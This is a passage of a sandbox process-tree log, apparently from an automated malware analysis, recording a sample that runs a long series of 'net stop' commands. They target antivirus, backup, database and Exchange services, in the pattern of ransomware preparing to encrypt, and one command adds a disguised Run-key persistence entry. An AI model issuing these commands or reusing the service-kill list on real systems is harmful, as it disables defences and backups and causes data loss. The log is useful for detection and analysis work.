C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:6548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:7844
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7420
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y2⤵PID:7928
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y2⤵PID:7776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:6380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y2⤵PID:7724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:7664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:6820
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y2⤵PID:6764
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y2⤵PID:8156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6276
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:6312
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y2⤵PID:7824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:7240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y2⤵PID:6684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:6512
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y2⤵PID:6156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:7852
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y2⤵PID:7944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:7204
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y2⤵PID:6260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:6996
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:6580
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:6524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:6708
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:7492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:7844
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:7916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:7144
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:6052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:7728
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:7180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:6868
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y2⤵PID:6152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:6224
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y2⤵PID:5380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7372
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:6824
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7600
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:7336
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y2⤵PID:6576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:6408
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y2⤵PID:6692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7504
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:5828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y2⤵PID:7484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:7936
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6908
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y2⤵PID:8172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:6964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y2⤵PID:7036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:6588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y2⤵PID:6392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:6848
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y2⤵PID:1284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:7104
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y2⤵PID:7892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:7496
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y2⤵PID:6352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:7460
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y2⤵PID:6788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:7232
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y2⤵PID:6928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:6208
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y2⤵PID:7172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:6504
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y2⤵PID:5816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:8064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y2⤵PID:6780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:5188
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y2⤵PID:8000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:7760
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y2⤵PID:7700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:2668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y2⤵PID:7320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:6828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y2⤵PID:6528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:7268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵PID:6288
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6952
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6780
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y2⤵PID:6472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:5364
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:7300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:4060
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y2⤵PID:7296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:7000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y2⤵PID:6344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:8028
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y2⤵PID:7756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y4⤵PID:7120
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:6692
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y2⤵PID:5448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:6632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y4⤵PID:8144
-
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:6984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:7580
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:7520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:5600
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵PID:6908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:6744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y2⤵PID:8116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:8072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y2⤵PID:7532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:7288
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfefire /y2⤵PID:7496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:8180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f2⤵PID:6820
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\eiavW.exe" /f3⤵PID:7620
- Adds Run key to start application
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵PID:6648
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:6324
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6704
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y2⤵PID:7360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:7040
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y2⤵PID:7076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:7252
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y2⤵PID:3932
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y2⤵PID:6148
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y2⤵PID:6992
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y2⤵PID:7692
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y2⤵PID:7404
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y2⤵PID:7792
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y2⤵PID:7540
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y2⤵PID:8104
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y2⤵PID:7068
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y2⤵PID:6496
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:6092
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y2⤵PID:7640
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7656
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6640
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y2⤵PID:6348
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y2⤵PID:5772
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y2⤵PID:6608
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:6216
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y2⤵PID:7964
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y2⤵PID:5132
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y2⤵PID:6812
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y2⤵PID:6632
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y2⤵PID:6932
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y2⤵PID:7420
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:7612
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y2⤵PID:6240
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:7792
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:6716
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:7508
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:6292
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y2⤵PID:7408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:7172
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6812
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y2⤵PID:6136
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y2⤵PID:6508
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y2⤵PID:7512
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y2⤵PID:6776
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y2⤵PID:6772
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y2⤵PID:7616
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y2⤵PID:6852
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y2⤵PID:7124
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6560
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y2⤵PID:6432
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y2⤵PID:6924
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y2⤵PID:7816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:5504
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y2⤵PID:6256
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y2⤵PID:7464
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y2⤵PID:6724
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y2⤵PID:7596
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:7732
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:7208
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:6248
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6368
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:6412
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:6452
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:7408
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:7268
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y2⤵PID:6260
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:7164
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y2⤵PID:6264
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y2⤵PID:6980
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:6528
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y2⤵PID:6876
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y2⤵PID:6844
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y2⤵PID:7364
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y1⤵PID:6952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:5932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:2392
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:8180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:6764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:6796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:6384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:6688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:6604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:6148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y2⤵PID:2364
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:6524
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:7192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y1⤵PID:7324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:8104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y2⤵PID:6944
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:7368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:7160
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLBrowser /y 1⤵ PID:6236
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6416
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y 1⤵ PID:6612
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop W3Svc /y 1⤵ PID:7228
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop wbengine /y 1⤵ PID:7600
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y 2⤵ PID:7868
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MMS /y 3⤵ PID:6308
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y 1⤵ PID:7464
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "Zoolz 2 Service" /y 1⤵ PID:7972
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ESHASRV /y 1⤵ PID:7080
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y 1⤵ PID:7324
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop NetMsmqActivator /y 1⤵ PID:6932
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop swi_service /y 2⤵ PID:7624
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop msftesql$PROD /y 1⤵ PID:6292
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y 2⤵ PID:7532
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop EhttpSrv /y 1⤵ PID:6764
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SAVAdminService /y 2⤵ PID:7188
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop AVP /y 1⤵ PID:6164
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop "SQL Backups" /y 1⤵ PID:6576
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7160
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$CXDB /y 1⤵ PID:8052
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y 1⤵ PID:6236
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7380
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y 1⤵ PID:7408
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6520
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y 1⤵ PID:7660
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6320
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y 1⤵ PID:8072
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6440
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y 1⤵ PID:7736
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y 1⤵ PID:6940
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7824
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y 1⤵ PID:6644
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y 1⤵ PID:6316
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7684
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SDRSVC /y 1⤵ PID:7156
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y 2⤵ PID:7632
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SAVService /y 1⤵ PID:6980
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSOLAP$TPS /y 2⤵ PID:6348
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ReportServer$TPSAMA /y 1⤵ PID:7088
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop RESvc /y 1⤵ PID:7076
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ReportServer$TPS /y 1⤵ PID:6572
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7092
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6644
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop POP3Svc /y 1⤵ PID:7780
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7040
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSExchangeMTA /y 2⤵ PID:7336
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:5188
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:7700
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y 1⤵ PID:7052
C:\Windows\System32\Conhost.exe \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 1⤵ PID:6856
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y 1⤵ PID:5152
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y 1⤵ PID:6388
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y 1⤵ PID:7564
